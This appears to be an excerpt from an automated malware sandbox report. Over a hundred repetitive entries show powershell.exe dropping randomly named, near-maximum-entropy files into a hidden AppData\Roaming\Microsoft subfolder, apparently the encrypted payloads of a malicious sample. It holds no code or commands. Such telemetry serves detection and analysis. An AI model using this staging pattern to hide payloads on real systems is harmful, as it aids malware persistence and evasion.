                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BSfdGNVoFyzKtrPQapL.PwQzJyxCGBNAlbVehc entropy: 7.99865772112Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\luqQJXdPpGHef.fxQuzBylFe entropy: 7.99683695611Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\HvBdpwFfxSjN.oevDUxZGEd entropy: 7.99825439955Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\wrENkOBQTIilo.CmlqrIDdfswgS entropy: 7.99695078044Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kaReSLHMDNCjd.BmpjaJXZLy entropy: 7.99757407175Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mrSfhYtocBCOGXniKlu.zITnyRuGslc entropy: 7.99853946278Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pIyjDcEgAxKfHBMwWn.ibgdoSxBvJXpsO entropy: 7.9988935762Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JDmbluHkMAvRQPzwjN.hbTZiSnNFPrd entropy: 7.99865219156Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WweARKxUhnzGd.RfDetyJBwqIuVCAhsj entropy: 7.99876594491Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AOaZlcBEzKNnt.NWOhyYopIwtxs entropy: 7.99853701203Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pIHzwhWPoCtJyQMcdYf.QXsBZLrWyiYldegSCU entropy: 7.998428656Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bFKBPNQUnoewfDECr.qnVyTJtYFZHxz entropy: 7.99906262223Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GwlaJKWHQYV.iEBDvALgUXGYQz entropy: 7.99910686844Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MedJtTXhGrZjWzbSCwc.ueBoDFHWjxvkwtgQlJS entropy: 7.99882497767Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MRczxHTYNfB.KlZHRUacLAQTkqdz entropy: 7.99728529687Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\keRWjtrHXhgfBuEpo.ChNHBsvquoKmgEf entropy: 7.99869351146Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uVKCciqjtJvy.TFqPXtdoYIius entropy: 7.99879348018Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yKiaAdGskN.bePNkQSFozIpEahHcy entropy: 7.99889603663Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qxtIbnfPeB.DpThtgjOiluaEeRsnUc entropy: 7.99903018645Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KHGtwVZTBQqYjUei.gELZdHkeSxKOzFjIh entropy: 7.99901852625Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nYhyEmGcPIK.rBiKdcykOnulxbRQXf entropy: 7.99738328523Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tidEUqDQMmRJuN.pHvkDFUXKnb entropy: 7.99687772749Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zaZeXJPrtBkvbosUM.JUWVxkLIovmRlgibHS entropy: 7.99846620638Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NmwdaSHLzrKcG.sUTeSQCDqMglv entropy: 7.99790826347Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RQNTbKkeZihpqDAa.QgnobFEcuPBMRlATavD entropy: 7.99905396791Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yTajVxHXOlBhwGgd.gzUDAbLthKqwlI entropy: 7.99714916091Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BbwTNlIovWfKFLhU.WpXZEviAhJnHPfwlRDM entropy: 7.99800571963Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCzNubFOAJTw.SRuJjOGKVDmLo entropy: 7.99842572578Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\syzTcpOoFHUWRZukvCn.lbUsxFnEVHJj entropy: 7.99810049214Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCPVwzOuUaBZm.eXJWGlrmvw entropy: 7.99788198865Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mFzrGopuJQNOTdk.IgYKySZhpwTmWclqVeb entropy: 7.99906657205Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rGtdscfVKoPDvQblue.mvfCdFtcHr entropy: 7.99905496935Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oIKiDVCakpHw.cDqyRkgfSdrsNABj entropy: 7.99789088457Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JncQjmMbqKTUzr.HNAmYrCiyGUOblqLox entropy: 7.99880332872Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QhXpkEIjKSCGAfNrnoD.ZwRhpmrkqFAfTo entropy: 7.99874473269Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VjxZCzMfWu.wIZnAKasSVge entropy: 7.99758832332Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PKtmvzhAfHwLQayDO.EHJOWhXcgMmyIQu entropy: 7.99864559192Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UASjmZVExuWitHd.cUpNCLnXqzkdMZjwlP entropy: 7.99898248131Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hEGsIYqpfoOB.QhnJFGiCElouTPMWOD entropy: 7.99867671944Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WdocsaMvqC.BEltMzSxPCu entropy: 7.99817009808Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KuibdswUXWGkVCv.HmAwfRjGSeOnrZy entropy: 7.99720329482Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NnbGWhVIHviQJUCl.emqxByXsKfNQDIlcZAr entropy: 7.99823537585Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pCcSxloMwaiItLhdAyg.JPuAMbnZyYIWz entropy: 7.99804695336Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oQGwTmSRbnlOWZj.EjAidlJqhstwzBQ entropy: 7.99895036957Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JzICspvGYNHr.rVpbfIRKceX entropy: 7.99911557094Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VNFnzYSLqGlsm.avQNMKtfDhAeUdoRmXu entropy: 7.99817369919Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cmfPUbXzeSDQtolu.cOLVfDuiXmTwQvIxhW entropy: 7.99853069121Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PzQxGhZMRuseFjit.ryMaLfYUwEIBs entropy: 7.99848875813Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\vOGKcUwLEnSaCDm.aSwbCHIFLxTVrXPJofN entropy: 7.99894216246Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\gITLBMtyernDGuQb.LwSzrHfIbcNkoF entropy: 7.999018932Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DtJjRnLMTbAholvw.CejnAUbatpqvxourYz entropy: 7.99716513314Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\enmCDFMOPZ.EkadGRjZpxKzh entropy: 7.99700445966Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\saVYAxOjykZ.HIQpmfEZFRqdtKvxU entropy: 7.99914742657Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\SfRdKQeADCtX.JvYsgXIiDlwhoxKntB entropy: 7.9990967308Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eCrZlGDugJvo.BjAEKmeRvyYPNVW entropy: 7.9991305342Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uUOgyWFwaveMtzbmGT.wtuJAXyjilxDLUfbY entropy: 7.99891595117Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TeLuOYhiUjVxzCo.QmnFOgcVdr entropy: 7.99885277201Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kPHhDNjVRlJbpWLw.uxhfYMvmcPOqQ entropy: 7.99907123467Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WOgMdFVzRxuwZPJnQki.yczDkMqjYSNFnv entropy: 7.99883357991Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZBdPHgSRjJTyFKU.LYPlgSiyFwMU entropy: 7.99896358128Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xguzsFEnXCV.eloCDkLIGYfQux entropy: 7.99763856911Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\FVonIAliJzxHBbkCut.qsWrNvAwFReG entropy: 7.99697002595Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\abpfVnJNdDg.tCRiUoQgSVrvlh entropy: 7.99884013222Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oHOZepRMCYPilyhX.ifzlgDILyw entropy: 7.99743398543Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mLHqylxgROeIY.saQFAtwbiS entropy: 7.99649155401Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bBhLMZRYrqAjmneT.ASclNopVXWiGux entropy: 7.99788567223Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RaQCLKpVhzYw.NSoHEYRjGuW entropy: 7.9981506172Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\YExswGcFQdmqReLk.yVEglkAHWTcpzJN entropy: 7.99770153984Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hqGZmJKCTLw.sNkaWTIvOLnKFUAJ entropy: 7.9986131944Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OcynixVmLeJDf.JkwQlRstjfhIrmu entropy: 7.99672353434Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kcmRWjHfYhGSDI.WaZwpSVMbLvF entropy: 7.99898542936Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TLuMnmVEcNIzhYlj.RSclJBIusQbepmFOrT entropy: 7.99902697943Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MagEIVHxsBdRNjp.NwflVaJYmxekzGrXL entropy: 7.99800201517Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cZOdDupgxkws.KXtgiImeojxpbWPuFvO entropy: 7.99869348666Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ojPnURfFIOLWAsphq.OPbdGKtvhCQlzA entropy: 7.99887595851Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KfqcBmRSYPI.wkHbjJsPoNZuFMKGt entropy: 7.99767238128Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EetxTnUuMRmVdSJrK.frolZptRyOaBkYzuALx entropy: 7.99874088276Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nVtfZzYLAsdWieo.SkZbYxzBrUimy entropy: 7.99869527112Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LrfdcACiFNqYpuDs.jMOiZnLTJKldseRp entropy: 7.99780665471Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EibUcfOkNaYIdv.SryhgGIeQaLE entropy: 7.99889732265Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GlOhxqcnumdRbSM.XNFbAQxVOTE entropy: 7.99873151846Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yxzIOePqZgWV.FZvxrjuBcshmCQiXz entropy: 7.99717449884Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BzlrQyfGXeaJn.HjqzEcSRlsvfuZF entropy: 7.99895675676Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AxjvQIoklqwZJTBFcb.tesRTCpyOzdQx entropy: 7.997452922Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\imvWkXOAGxfTzHJ.jcdIsOiMhXfJW entropy: 7.99903468474Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\eWylVtdKbnQsAOrFXBC.QTPEUDeznKIt entropy: 7.99887347353Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ARPWhfQocinEXVCa.DcNgqetOiJ entropy: 7.99834611833Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nrPdzlWUTZMvCxiFg.IVocudRDyhq entropy: 7.99921367602Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tOJaAuCTFKQfVXPsbR.VRFiGlLxXEPJYnAI entropy: 7.99701483443Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MEwsSeXUYrxJmdkRBW.bVSjvmysqIx entropy: 7.99872493056Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UCFaKkJmTSsWyh.qGRMCmWBiYKnoHSlLEb entropy: 7.99833658082Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nbdHxsrGkAhfXtMRwW.pxgjWrdGRQi entropy: 7.9987548034Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pvqeMSzPZs.tKjEShlWDUXs entropy: 7.998041758Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AIMcfPgWhH.HYLqKIlefgPpWDaGCN entropy: 7.99898660333Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EWHPbGfTDN.EVbAQjGoKnJvWNhqg entropy: 7.99825648822Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\cFeZwbNdUY.FVeoIvhgiBw entropy: 7.99898039812Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WXUMcfOEhAxazDm.BQYpoGWVfIL entropy: 7.99687326097Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xXeNBRagpncOPSMt.TDpsAaYbwMldcU entropy: 7.99634373313Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\KORBQhiEWj.FGNnjuCxzpTisyBv entropy: 7.99762955814Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AYQMbHDVCoyzOhLndP.ZCDMOyWhbvklRHpF entropy: 7.99883825013Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fGDIzwUjLRKFkg.OWMZLFlYPbmygzu entropy: 7.99816352518Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\XyzwqDGQdxARegWKLnV.cduOWzUjoFsgP entropy: 7.99757494444Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nZgWUTfIbV.NcIMegvYBwQATEHFZ entropy: 7.99724948268Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZJkgcGOoaTPenB.WLfQqizIwsuJxE entropy: 7.99875624834Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pwvaHtXxfPomRFi.lmrAWGwiSjMHc entropy: 7.99824869885Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dhrmUeoMODzQxCWq.NBVdnbxzqp entropy: 7.99821142307Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NUuwnlhMdTb.LDJtiwjYkGKSH entropy: 7.99819950811Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\iIGPluZOfbEmYh.ioCBfbmrAwnNlaUsE entropy: 7.99829297226Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\JFYKMsSjbVLQNdTk.HpWmvDgAnrchQt entropy: 7.99840474769Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aUtheHQOTCRdwsVD.hDORUVXsmCy entropy: 7.99747605958Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\syJNYEdIUnhaRD.kKpDTwMhruvlPFIVi entropy: 7.99819478316Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AWuIpnSbxmefzZ.iOLQcEGMqBSXN entropy: 7.99831789391Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RBArIVNnXHyhJFkCQs.zVcHABCaPI entropy: 7.99822597917Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zHIyjvMFtdYk.geMbQnDuPof entropy: 7.99683581179Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bDvTyXjJYBxmzetou.YVNGpZfmxqFJwtu entropy: 7.99887448833Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pkfyjRWtwVO.vtdVMXcwBxhJyTaq entropy: 7.99892773717Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kYmAclZxQFBMaEdTjK.igzOmbvRhMplPTVntAd entropy: 7.99897201572Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MNEcQaHKpDeryAWB.jctmgixrqodyPfQZ entropy: 7.99810087137Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hcaSWXdxIkBryut.GnSbFiUQNJR entropy: 7.9984104363Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\OwLvGfFIgjatNhXYk.jDUyZcMJCXF entropy: 7.99706800061Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NqklLpvEIisy.iUnQhIslVWz entropy: 7.99879567516Jump to dropped file
